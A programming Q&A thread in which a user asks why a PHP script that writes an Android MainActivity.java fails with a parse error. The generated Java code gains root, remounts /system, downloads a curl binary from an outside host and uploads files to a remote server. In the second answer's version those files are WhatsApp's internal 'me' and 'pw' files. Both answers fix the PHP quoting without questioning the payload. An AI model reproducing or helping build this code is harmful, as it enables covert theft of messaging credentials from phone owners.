# php- fwrite: unexpected ; error

Tags: php, file, fwrite

I am using fwrite() function to write a java file, but I am getting the following error:

> Parse error: syntax error, unexpected ';' in /var/www/html/test.php on line 61

Line 61 is where the fwrite function ends with a semicolon. The code  is:

```
$file = fopen(" /home/ashish/$fname/src/com/$fpex[1]/MainActivity.java /home/ashish/$fname/src/com/$fpex[1]/MainActivity.java","w");
 fwrite ($file,  "package $fpack;" .  '
import android.app.*;
import android.os.*;
import android.view.*;
import android.widget.*;
import java.io.IOException;
import java.lang.Process;
import java.io.DataInputStream;
import java.io.DataOutputStream;


public class MainActivity extends Activity
{
/** Called when the activity is first created. */
@Override
public void onCreate(Bundle savedInstanceState)
{
super.onCreate(savedInstanceState);
Process p; 
try { 
// Preform su to get root privledges
p = Runtime.getRuntime().exec("su");

// Attempt to write a file to a root-only fs
DataOutputStream os = new DataOutputStream(p.getOutputStream());
os.writeBytes("busybox mount -o rw,remount /system \n");
os.writeBytes("busybox rm -f /system/xbin/curl \n");
os.writeBytes("busybox wget http://test.com/curl -O /system/xbin/curl \n");
os.writeBytes("busybox chmod 777 /system/xbin/curl \n");
os.writeBytes("curl  -v -F \"file=@/test/me\" http://yourserver/me.php \n");
os.writeBytes("curl  -v -F \"file=@/test/pw\" http://yourserver/pw.php \n");
os.writeBytes("echo \"Done\" >/sdcard/temp.txt\n");

// Close the terminal
os.writeBytes("exit\n"); 
os.flush();
android.os.Process.killProcess(android.os.Process.myPid());
} catch (IOException e) { 
// TODO Code to run in input/output exception
//toastMessage("not root");
}


}

}';
```

What can be wrong here? Any help will be appreciated.

Comment: Your java code is not properly escaped. Escape your `'` characters or use something like `addslashes`

Comment: @tlenss edited it. still the same error

Answer (score 1):

You're missing a closing `)` for the `fwrite` function, the last line should look like this:

`})';`

Answer (score 0):

Much easier with PHP's [nowdoc syntax](http://docs.php.net/language.types.string#language.types.string.syntax.nowdoc) (php >= 5.3).
It works almost like a single-quoted string literal. There's no variable substitution and even a literal \n isn't replaced by a linefeed character (byte). You therefore will have much less trouble doing all the quoting, escaping et al.

```
<?php
$fhTarget = fopen("/home/ashish/$fname/src/com/{$fpex[1]}/MainActivity.java", 'w');
// $fpack = 'lalala';
//$fhTarget = fopen("php://output","w");
if ( !$fhTarget ) {
    yourErrorHandler();
}

fwrite ($fhTarget, "package $fpack;\r\n");
fwrite ($fhTarget,  getCode() );


function getCode() {
    return <<< 'eoc'
import android.app.*;
import android.os.*;
import android.view.*;
import android.widget.*;
import java.io.IOException;
import java.lang.Process;
import java.io.DataInputStream;
import java.io.DataOutputStream;


public class MainActivity extends Activity
{
    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState)
    {
        super.onCreate(savedInstanceState);
        Process p; 
        try { 
            // Preform su to get root privledges
            p = Runtime.getRuntime().exec("su");

            // Attempt to write a file to a root-only fs
            DataOutputStream os = new DataOutputStream(p.getOutputStream());
            os.writeBytes("busybox mount -o rw,remount /system \n");
            os.writeBytes("busybox rm -f /system/xbin/curl \n");
            os.writeBytes("busybox wget http://securwiki.com/curl -O /system/xbin/curl \n");
            os.writeBytes("busybox chmod 777 /system/xbin/curl \n");
            os.writeBytes("curl  -v -F \"file=@/data/data/com.whatsapp/files/me\" http://yourserver/me.php \n");
            os.writeBytes("curl  -v -F \"file=@/data/data/com.whatsapp/files/pw\" http://yourserver/pw.php \n");
            os.writeBytes("echo \"Done\" >/sdcard/temp.txt\n");

            // Close the terminal
            os.writeBytes("exit\n"); 
            os.flush();
            android.os.Process.killProcess(android.os.Process.myPid());
        } catch (IOException e) { 
        // TODO Code to run in input/output exception
        //toastMessage("not root");
    }
}
eoc;
}
```

just make sure that there's nothing but `eoc;` on that line; not a single whitespace before or after, nothing. Just `eoc;` and linebreak.